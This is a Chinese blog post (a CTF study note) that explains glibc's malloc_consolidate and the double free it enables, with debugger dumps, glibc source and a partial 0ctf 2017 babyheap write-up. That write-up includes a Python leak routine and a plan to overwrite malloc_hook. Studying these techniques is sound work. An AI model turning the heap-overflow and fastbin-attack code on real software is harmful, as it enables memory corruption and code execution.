<!DOCTYPE html>
<html lang="en">
<head>
  <link rel="manifest" href="/manifest.json">
  <link rel="apple-touch-startup-image" href="images/hexo.png">
  <link rel="apple-touch-icon" href="images/icons/icon-72x72.png">
<link rel="apple-touch-icon" sizes="152x152" href="images/icons/icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="images/icons/icon-192x192.png">
<link rel="apple-touch-icon" sizes="167x167" href="images/icons/icon-192x192.png">
  <meta charset="utf-8">
  
  
    <meta name="keywords" content="Migraine,个人博客,日记,pwn,二进制,ctf,浏览器">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    How2Heap堆利用学习笔记(二)consolidate |
    
    Migraine</title>
  
    <link rel="shortcut icon" href="/fujiang.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
<main class="content">
  <section class="outer">
  

<article id="post-how2heap2" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      How2Heap堆利用学习笔记(二)consolidate
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2019/11/25/how2heap2/" class="article-date">
  <time datetime="2019-11-25T02:43:39.000Z" itemprop="datePublished">2019-11-25</time>
</a>
        
  <div class="article-category">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
  </div>

      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <p>注：首发于<a href="https://www.anquanke.com/post/id/193132" target="_blank" rel="noopener">安全客</a></p>
<blockquote>
<p>上一篇，我们介绍了一种Double free技术。并且实现了对malloc_hook的fastbin_attack。<br>这次将介绍如何利用malloc中的consolidate机制来实现double free。本文会涉及一些源代码，如有解释错误，恳请各位大神指正。</p>
</blockquote>
 <a id="more"></a>

<h1 id="0x01-利用consolidate的Double-Free"><a href="#0x01-利用consolidate的Double-Free" class="headerlink" title="0x01 利用consolidate的Double Free"></a>0x01 利用consolidate的Double Free</h1><h2 id="1-1-fastbin-dup-consolidate分析"><a href="#1-1-fastbin-dup-consolidate分析" class="headerlink" title="1.1 fastbin_dup_consolidate分析"></a>1.1 fastbin_dup_consolidate分析</h2><p> 首先分析一下案例代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdint.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line">  void* p1 &#x3D; malloc(0x40);</span><br><span class="line">  void* p2 &#x3D; malloc(0x40);</span><br><span class="line">  fprintf(stderr, &quot;Allocated two fastbins: p1&#x3D;%p p2&#x3D;%p\n&quot;, p1, p2);</span><br><span class="line">  fprintf(stderr, &quot;Now free p1!\n&quot;);</span><br><span class="line">  free(p1);</span><br><span class="line"></span><br><span class="line">  void* p3 &#x3D; malloc(0x400);</span><br><span class="line">  fprintf(stderr, &quot;Allocated large bin to trigger malloc_consolidate(): p3&#x3D;%p\n&quot;, p3);</span><br><span class="line">  fprintf(stderr, &quot;In malloc_consolidate(), p1 is moved to the unsorted bin.\n&quot;);</span><br><span class="line">  free(p1);</span><br><span class="line">  fprintf(stderr, &quot;Trigger the double free vulnerability!\n&quot;);</span><br><span class="line">  fprintf(stderr, &quot;We can pass the check in malloc() since p1 is not fast top.\n&quot;);</span><br><span class="line">  fprintf(stderr, &quot;Now p1 is in unsorted bin and fast bin. So we&#39;will get it twice: %p %p\n&quot;, malloc(0x40), malloc(0x40));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>编译程序时时加-g参数，动态调试中可以同步源码进行分析。</p>
<p><img src="https://gitee.com/p0kerface/blog_image_management/raw/master/uploads/how2heap15159.png" alt=""> </p>
<h2 id="1-2流程分析"><a href="#1-2流程分析" class="headerlink" title="1.2流程分析"></a>1.2流程分析</h2><p>程序首先malloc分配了两个0x40的内存p1和p2,然后free掉chunk_p1,小于64的chunkp1会被链入fastbins中。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;40gx 0x602010-0x10</span><br><span class="line">0x602000:	0x0000000000000000	0x0000000000000051 </span><br><span class="line">0x602010:	0x0000000000000000	0x0000000000000000 &lt;--chunk_p1</span><br><span class="line">0x602020:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602030:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602040:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602050:	0x0000000000000000	0x0000000000000051</span><br><span class="line">0x602060:	0x0000000000000000	0x0000000000000000  &lt;--chunk_p2</span><br><span class="line">0x602070:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602080:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602090:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6020a0:	0x0000000000000000	0x0000000000020f61</span><br></pre></td></tr></table></figure>
<p>查看快表,可以看到被释放的chunk_p1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gef➤  heap bins fast </span><br><span class="line">─────[ Fastbins for arena 0x7ffff7dd1b20 ]─────</span><br><span class="line">Fastbin[3]  →   UsedChunk(addr&#x3D;0x602010,size&#x3D;0x50)</span><br></pre></td></tr></table></figure>


<p>执行分配0x400内存，此时看fastbin，发现chunk_p1已经被从快表中卸下了。而我们在small bins中找到了它。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">gef➤  heap bins fast </span><br><span class="line">────[ Fastbins for arena 0x7ffff7dd1b20 ]───</span><br><span class="line">Fastbin[0] 0x00</span><br><span class="line">Fastbin[1] 0x00</span><br><span class="line">Fastbin[2] 0x00</span><br><span class="line">Fastbin[3] 0x00</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gef➤  heap bins small </span><br><span class="line">───[ Small Bins for arena &#39;main_arena&#39; ]────</span><br><span class="line">[+] Found base for bin(4): fw&#x3D;0x602000, bk&#x3D;0x602000</span><br><span class="line"> →   FreeChunk(addr&#x3D;0x602010,size&#x3D;0x50)</span><br></pre></td></tr></table></figure>




<p>glibc在分配large chunk(&gt;1024字节)时，首先操作是判断fast bins是否包含chunk。如果包含，则使用malloc_consolidate函数将fastbin中的chunk合并，并放入unsortbins。根据大小放入small bins/large bins。</p>
<p>让我通过glibc源码进行阅读分析 ，FTP<a href="https://ftp.gnu.org/gnu/glibc/" target="_blank" rel="noopener">下载地址</a>,malloc的实现在/malloc/malloc.c</p>
<p>malloc.c在1055行分别定义了malloc free realloc函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">static void*  _int_malloc(mstate, size_t);</span><br><span class="line">static void     _int_free(mstate, mchunkptr, int);</span><br><span class="line">static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,</span><br><span class="line">​			   INTERNAL_SIZE_T);</span><br></pre></td></tr></table></figure>


<p>在_int_malloc的Define下找到触发consolidate的代码部分。</p>
<p>首先通过have_fastchunks判断fastbins是否链有空闲堆。</p>
<p>have_fastchunks的宏定义即为判断fastbin中是否包含chunk，flag为0的时候说明存在chunk。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">#define have_fastchunks(M)     (((M)-&gt;flags &amp; FASTCHUNKS_BIT) &#x3D;&#x3D; 0)</span><br></pre></td></tr></table></figure>
<p>如果包含chunk，将会调用consolidate来合并fastbins中的chunk，并将这些空闲的chunk加入unsorted bin中。</p>
<p>本案例触发consolidate的源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">  &#x2F;*</span><br><span class="line">​     If this is a large request, consolidate fastbins before continuing.</span><br><span class="line">​     While it might look excessive to kill all fastbins before</span><br><span class="line">​     even seeing if there is space available, this avoids</span><br><span class="line">​     fragmentation problems normally associated with fastbins.</span><br><span class="line">​     Also, in practice, programs tend to have runs of either small or</span><br><span class="line">​     large requests, but less often mixtures, so consolidation is not</span><br><span class="line">​     invoked all that often in most programs. And the programs that</span><br><span class="line">​     it is called frequently in otherwise tend to fragment.</span><br><span class="line">   *&#x2F;</span><br><span class="line"></span><br><span class="line">  else</span><br><span class="line">​    &#123;</span><br><span class="line">​      idx &#x3D; largebin_index (nb);</span><br><span class="line">​      if (have_fastchunks (av))</span><br><span class="line">​        malloc_consolidate (av);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<p>malloc_consolidate部分的源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line">static void malloc_consolidate(mstate av)</span><br><span class="line">&#123;</span><br><span class="line">  &#x2F;*</span><br><span class="line">    If max_fast is 0, we know that av hasn&#39;t</span><br><span class="line">    yet been initialized, in which case do so below</span><br><span class="line">  *&#x2F;</span><br><span class="line">&#x2F;&#x2F;判断fastbins是否存在chunks</span><br><span class="line">  if (get_max_fast () !&#x3D; 0) &#123;</span><br><span class="line">    clear_fastchunks(av); &#x2F;&#x2F;将fastchunk的flag标志设置为0</span><br><span class="line"></span><br><span class="line">    unsorted_bin &#x3D; unsorted_chunks(av); &#x2F;&#x2F;获取unsorted_bin指针</span><br><span class="line"></span><br><span class="line">    &#x2F;*</span><br><span class="line">      Remove each chunk from fast bin and consolidate it, placing it</span><br><span class="line">      then in unsorted bin. Among other reasons for doing this,</span><br><span class="line">      placing in unsorted bin avoids needing to calculate actual bins</span><br><span class="line">      until malloc is sure that chunks aren&#39;t immediately going to be</span><br><span class="line">      reused anyway.</span><br><span class="line">    *&#x2F;</span><br><span class="line">    maxfb &#x3D; &amp;fastbin (av, NFASTBINS - 1); &#x2F;&#x2F;获取fastbin链的末尾作为限位器</span><br><span class="line">    fb &#x3D; &amp;fastbin (av, 0); &#x2F;&#x2F;当前fastbin链的地址</span><br><span class="line">    do &#123;</span><br><span class="line">      p &#x3D; atomic_exchange_acq (fb, 0);&#x2F;&#x2F;不太懂这一句，希望有大佬能解答</span><br><span class="line">&#x2F;&#x2F;遍历fastbins，直到遍历结束</span><br><span class="line">      if (p !&#x3D; 0) &#123;</span><br><span class="line">	do &#123;</span><br><span class="line">	  check_inuse_chunk(av, p);</span><br><span class="line">	  nextp &#x3D; p-&gt;fd; </span><br><span class="line"></span><br><span class="line">	  &#x2F;* Slightly streamlined version of consolidation code in free() *&#x2F;</span><br><span class="line">	  size &#x3D; p-&gt;size &amp; ~(PREV_INUSE|NON_MAIN_ARENA);</span><br><span class="line">	  nextchunk &#x3D; chunk_at_offset(p, size);</span><br><span class="line">	  nextsize &#x3D; chunksize(nextchunk);</span><br><span class="line"></span><br><span class="line">	  if (!prev_inuse(p)) &#123;</span><br><span class="line">	    prevsize &#x3D; p-&gt;prev_size;</span><br><span class="line">	    size +&#x3D; prevsize;</span><br><span class="line">	    p &#x3D; chunk_at_offset(p, -((long) prevsize));</span><br><span class="line">	    unlink(av, p, bck, fwd);</span><br><span class="line">	  &#125;</span><br><span class="line"></span><br><span class="line">	  if (nextchunk !&#x3D; av-&gt;top) &#123;</span><br><span class="line">	    nextinuse &#x3D; inuse_bit_at_offset(nextchunk, nextsize);</span><br><span class="line"></span><br><span class="line">	    if (!nextinuse) &#123;</span><br><span class="line">	      size +&#x3D; nextsize;</span><br><span class="line">	      unlink(av, nextchunk, bck, fwd);</span><br><span class="line">	    &#125; else</span><br><span class="line">	      clear_inuse_bit_at_offset(nextchunk, 0);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;将fastbin合并的chunk添加到链接到unsorted_bin的链中</span><br><span class="line">	    first_unsorted &#x3D; unsorted_bin-&gt;fd;</span><br><span class="line">	    unsorted_bin-&gt;fd &#x3D; p;</span><br><span class="line">	    first_unsorted-&gt;bk &#x3D; p;</span><br><span class="line"></span><br><span class="line">	    if (!in_smallbin_range (size)) &#123;</span><br><span class="line">	      p-&gt;fd_nextsize &#x3D; NULL;</span><br><span class="line">	      p-&gt;bk_nextsize &#x3D; NULL;</span><br><span class="line">	    &#125;</span><br><span class="line"></span><br><span class="line">	    set_head(p, size | PREV_INUSE);</span><br><span class="line">	    p-&gt;bk &#x3D; unsorted_bin;</span><br><span class="line">	    p-&gt;fd &#x3D; first_unsorted;</span><br><span class="line">	    set_foot(p, size);</span><br><span class="line">	  &#125;</span><br><span class="line"></span><br><span class="line">	  else &#123;</span><br><span class="line">	    size +&#x3D; nextsize;</span><br><span class="line">	    set_head(p, size | PREV_INUSE);</span><br><span class="line">	    av-&gt;top &#x3D; p;</span><br><span class="line">	  &#125;</span><br><span class="line"></span><br><span class="line">	&#125; while ( (p &#x3D; nextp) !&#x3D; 0);</span><br><span class="line"></span><br><span class="line">      &#125;</span><br><span class="line">    &#125; while (fb++ !&#x3D; maxfb);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;如果fastbin为空</span><br><span class="line">  else &#123;</span><br><span class="line">    malloc_init_state(av);</span><br><span class="line">    check_malloc_state(av);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>想了解Glibc具体如何实现的，非常安利华庭大佬写的《glibc内存管理》，讲解的非常详细，看完一定会有收获。</p>
<p>继续我们的程序分析，目前我们已经将chunk_p1放入了small_bins中。</p>
<p>此时free(p1)并不会触发double free检测。看下面的图，就能很容易能明白原因。</p>
<p>P1默认会被释放到fast bins，而同时之前的P1也被释放在smallbins中，程序并没有对此做出检测。</p>
<p><img src="https://gitee.com/p0kerface/blog_image_management/raw/master/uploads/how2heap20065.png" alt=""> </p>
<p>最后两次malloc(0x40)第一次从fastbins中获取了chunk_p1的地址，第二次从small_bins中获取了相同的地址。完成了一次double free。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">0x6020a0:	0x0000000000000000	0x0000000000000411</span><br><span class="line">gef➤  x&#x2F;20  0x602010-0x10</span><br><span class="line">0x602000:	0x0000000000000000	0x0000000000000051</span><br><span class="line">0x602010:	0x0000000000000000	0x00007ffff7dd1bb8 &lt;-- chunk_p4,chunk_p5(old_chunk_p1)</span><br><span class="line">0x602020:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602030:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602040:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602050:	0x0000000000000050	0x0000000000000051&lt;--chunk_p2</span><br></pre></td></tr></table></figure>




<h2 id="1-3小结"><a href="#1-3小结" class="headerlink" title="1.3小结"></a>1.3小结</h2><p>结合上一篇文章，目前我们已经掌握两种针对fastbins的double free技巧做个总结.</p>
<p>1.在两次free中间，free另一块相同size的内存，绕过检测在fastbins中释放两次同一块chunk。一般可以结合fastbin_attack.</p>
<p>2.利用consolidate机制，分别在fastbins和bins(small/large)中free同一个chunk。一般结合unlink技术实现任意地址写。</p>
<p>下面会给出两个针对性案例进行分析</p>
<h1 id="0x02-案例分析："><a href="#0x02-案例分析：" class="headerlink" title="0x02 案例分析："></a>0x02 案例分析：</h1><h2 id="2-1-0ctf-2017-babyheap"><a href="#2-1-0ctf-2017-babyheap" class="headerlink" title="2.1 0ctf 2017 babyheap"></a>2.1 0ctf 2017 babyheap</h2><p>概述：经典的fastbin_attack题型，首先要实现地址泄露，然后通过覆写malloc_hook获取shell</p>
<h3 id="2-1-1逆向分析"><a href="#2-1-1逆向分析" class="headerlink" title="2.1.1逆向分析"></a>2.1.1逆向分析</h3><p>因为之前做的题都是有源码的，这题会逆向分析的详细一些，有基础的师傅可以跳过这一段。</p>
<p>程序开头是堆题的基本操作，。我们都知道内存分配后的指针是不会保存在本地，而是全部由用户进行保存和使用。通过调用sub_B70()函数，程序为了能让用户通过index来确定内存空间地址，开辟的空间是用于存放一数组（实际上应该是结构体），用于存放申请内存空间的指针。根据每次通过输入index操作内存，24LL * index + a1每个结构体的大小应为24字节。</p>
<p>之后就是喜闻乐见的switch case菜单题，分别代表了Allocate分配、 Fill写入、 Free释放、 Dump输出。虽然有所封装，但是几乎可以无视了。值得注意的是使用calloc分配内存，在分配之前会将该内存中的数据清零。</p>
<p>漏洞出在Fill，Fill不会限制写入字节，于是会导致堆溢出。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  char *v4; &#x2F;&#x2F; [rsp+8h] [rbp-8h]</span><br><span class="line">  v4 &#x3D; sub_B70();</span><br><span class="line">  while ( 1 )</span><br><span class="line">  &#123;</span><br><span class="line">​    sub_CF4(a1, a2);</span><br><span class="line">​    sub_138C();</span><br><span class="line">​    switch ( (unsigned __int64)off_14F4 )</span><br><span class="line">​    &#123;</span><br><span class="line">​      case 1uLL:</span><br><span class="line">​        a1 &#x3D; (__int64)v4;</span><br><span class="line">​        Allocate((__int64)v4);</span><br><span class="line">​        break;</span><br><span class="line">​      case 2uLL:</span><br><span class="line">​        a1 &#x3D; (__int64)v4;</span><br><span class="line">​        Fill(v4);</span><br><span class="line">​        break;</span><br><span class="line">​      case 3uLL:</span><br><span class="line">​        a1 &#x3D; (__int64)v4;</span><br><span class="line">​        Free((__int64)v4);</span><br><span class="line">​        break;</span><br><span class="line">​      case 4uLL:</span><br><span class="line">​        a1 &#x3D; (__int64)v4;</span><br><span class="line">​        Dump(v4);</span><br><span class="line">​        break;</span><br><span class="line">​      case 5uLL:</span><br><span class="line">​        return 0LL;</span><br><span class="line">​      default:</span><br><span class="line">​        continue;</span><br><span class="line">​    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>




<p>查看保护机制，PIE也开启了（不过必须与ASLR共同开启才能产生作用），也就是说程序段的地址也会偏移。所以需要注意，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">gef➤  checksec</span><br><span class="line">[+] checksec for &#39;&#x2F;home&#x2F;p0kerface&#x2F;Documents&#x2F;Lab&#x2F;0ctfbabyheap&#39;</span><br><span class="line">Canary                        : Yes →  value: 0x6d01c8ace13dec00</span><br><span class="line">NX                            : Yes</span><br><span class="line">PIE                           : Yes</span><br><span class="line">Fortify                         : No</span><br><span class="line">RelRO                         : Full</span><br></pre></td></tr></table></figure>


<h3 id="2-1-2利用思路"><a href="#2-1-2利用思路" class="headerlink" title="2.1.2利用思路"></a>2.1.2利用思路</h3><p>1.利用的地址泄露来获取libc的基地址。通过获取free的chunk中的unsorted bin地址（main_arena在libc的data段）。</p>
<p>2.通过fastbin_attack覆写malloc_hook（通过偏移可以计算出）</p>
<p>0.Leak Base</p>
<p>因为程序开启了ASLR和PIE，虽然其实这对堆利用影响不大，但是对我们攻击的地址，比如malloc_hook的地址会产生影响。所以我们需要将Libc的地址泄露出来。</p>
<p>利用思路主要参考大佬写的<a href="https://blog.csdn.net/qq_29343201/article/details/66476135" target="_blank" rel="noopener">文章</a>。</p>
<p>利用的是利用chunk_0堆溢出覆写chunk_1,的size（0x40扩大到0x60）,然后释放后重新申请，欺骗程序这块内存地址为0x60。这样chunk_1就能dump chunk_2的内容了。</p>
<p>然后释放chunk_2,chunk2的FD和BK便是指向unsorted bins的指针。DUMP就能获取基地址。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">def leak():</span><br><span class="line">​	#leak</span><br><span class="line">​	Alloc(0x60) #index 0</span><br><span class="line">​	Alloc(0x40) #index 1</span><br><span class="line"> </span><br><span class="line">​	payload&#x3D;&quot;a&quot;*0x60</span><br><span class="line">​	payload+&#x3D;p64(0)+p64(0x71) #Chunk -&gt;size</span><br><span class="line">​	Fill(0,payload)</span><br><span class="line"></span><br><span class="line">​	Alloc(0x80) #index 2</span><br><span class="line">​	Alloc(0x10) #index 3 ,to avoid chunk_2 merge into top_chunk</span><br><span class="line"> </span><br><span class="line">​	#Bk_NextSize&#x3D;0x71, to avoid &quot;free(): invalid next size (fast)&quot;</span><br><span class="line">​	payload&#x3D;p64(0)*3</span><br><span class="line">​	payload+&#x3D;p64(0x71) #Chunk2-&gt;BK_nextsize</span><br><span class="line">​	Fill(2,payload)</span><br><span class="line">​	Free(1)</span><br><span class="line">​	Alloc(0x60) #index 1</span><br><span class="line"></span><br><span class="line">​	#Fix smallChunk</span><br><span class="line">​	payload&#x3D;&quot;a&quot;*0x40</span><br><span class="line">​	payload+&#x3D;p64(0)+p64(0x91) #Chunk -&gt;size</span><br><span class="line">​	Fill(1,payload)</span><br><span class="line"></span><br><span class="line">​	Free(2)</span><br><span class="line">​	Dump(1)</span><br><span class="line">​	p.recv(82)</span><br><span class="line">​	leak_address&#x3D;u64(p.recv(8))</span><br><span class="line">​	print &quot;leak stirngs&#x3D;&gt;&quot;+hex(leak_address)</span><br><span class="line">​	#Free(0) #for debug</span><br><span class="line">​	return leak_address</span><br></pre></td></tr></table></figure>
<p>成功leak时候的内存空间</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;50xg 0x561043fcd010-0x10</span><br><span class="line">0x561043fcd000:	0x0000000000000000	0x0000000000000071 &lt;--chunk_0</span><br><span class="line">0x561043fcd010:	0x0000000000000000	0x6161616161616161</span><br><span class="line">0x561043fcd020:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd030:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd040:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd050:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd060:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd070:	0x0000000000000000	0x0000000000000071 &lt;-chunk_1</span><br><span class="line">0x561043fcd080:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd090:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd0a0:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd0b0:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x561043fcd0c0:	0x0000000000000000	0x0000000000000091 &lt;-chunk_2</span><br><span class="line">0x561043fcd0d0:	0x00007fd34f48bb78	0x00007fd34f48bb78 &lt;- unsorted bins [leak]</span><br><span class="line">0x561043fcd0e0:	0x0000000000000000	0x0000000000000071 &lt;-bk_next_size</span><br><span class="line">0x561043fcd0f0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x561043fcd100:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x561043fcd110:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x561043fcd120:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x561043fcd130:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x561043fcd140:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x561043fcd150:	0x0000000000000090	0x0000000000000020</span><br><span class="line">0x561043fcd160:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x561043fcd170:	0x0000000000000000	0x0000000000020e91 &lt;--top chunk</span><br></pre></td></tr></table></figure>






<p>1.Fastbin_attack</p>
<p>相比Libc Address部分的有些复杂，这部分就比较中规中矩了，都是上一篇文章讲的东西。通过覆写chunk的fastbin链来达到任意地址写的目的。</p>
<p>Leak的公式:</p>
<p>泄露的地址-（unsortbin的偏移地址）=libc的基地址</p>
<p>然后利用Fastbin_attack覆写malloc_hook地址</p>
<p>通过vmmap可以计算出，unsorted bins距离libc的偏移地址为 0x3c4b78</p>
<p>下图，计算出的地址与vmmap出的结果相同。</p>
<p><img src="https://gitee.com/p0kerface/blog_image_management/raw/master/uploads/how2heap24959.png" alt=""> </p>
<p>完整利用脚本</p>
